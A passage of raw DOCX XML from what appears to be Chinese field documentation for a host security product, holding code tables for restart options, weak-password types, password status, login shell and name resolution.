          </w:tcPr>
          <w:p w14:paraId="0A67F9C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51E4F8CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>不需要重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="52FDF282" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4282BCFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C995F53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12EAC115" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A6995FA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="734D41AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75DDDC51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5A1878" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FAB5E41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="是否存在进程影响"/>
      <w:bookmarkEnd w:id="283"/>
      <w:r>
        <w:t>是否存在进程影响</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="32ED341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C4BB38F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F346DE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79685762" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65885A12" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F499B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>businessImpact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B909BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FB7B430" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无进程影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A0EA33D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AF44D11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>businessImpact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493D4790" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EEF369A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>有进程影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E992737" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="弱密码类型"/>
      <w:bookmarkEnd w:id="284"/>
      <w:r>
        <w:t>弱密码类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1177"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2C20C7C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4822A78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50A40DFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40B99F4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B57FA16" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009DEF39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>weakType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45EF18D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00983C8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>空密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="64944A19" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29220A6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>weakType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19F66398" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5784F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>默认弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="797419BF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27EB8989" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>weakType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12080831" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="592EF4D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>跟用户名相同</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="16B0826D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="760CAA52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>weakType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EEF0865" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1321E73B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>常见弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C8847B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="286" w:name="密码状态"/>
      <w:bookmarkEnd w:id="285"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>密码状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1225"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7D63DF1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334398E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6590E303" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0261CF8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A29E908" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B7235CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6786A5C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3391C471" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41A2F9F2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34DDCAC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB8D2F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C812631" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>将要失效</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A020F8B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="245B9215" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67FFE8F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F988A64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>已经失效</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A3C85DD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C1B32F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A7E33AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56912B72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>已锁定</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EE833C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="287" w:name="shell登录性"/>
      <w:bookmarkEnd w:id="286"/>
      <w:r>
        <w:t>shell登录性</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1168"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1305"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="24541DA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D16E727" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AEB42A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03425F71" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="002A228E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A02C24B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66E48AA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68A795C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>非登录shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7FA74D26" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B7C4F97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B0641EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A1C02E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50479BB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="288" w:name="解析方式"/>
      <w:bookmarkEnd w:id="287"/>
      <w:r>
        <w:t>解析方式</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1064"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4D056A4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62DD7DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07BEC9A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D49A32A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76218ED8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63CA444F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>translate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61AB7ED6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B2DC66A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>host解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5AABE554" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0071F978" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>translate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F7C33F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AE1FCCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dns解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F89A721" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="289" w:name="风险文件危险等级"/>
      <w:bookmarkEnd w:id="288"/>
      <w:r>
        <w:t>风险文件危险等级</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1249"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0EDD6E7B"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EDD47C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A1745E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
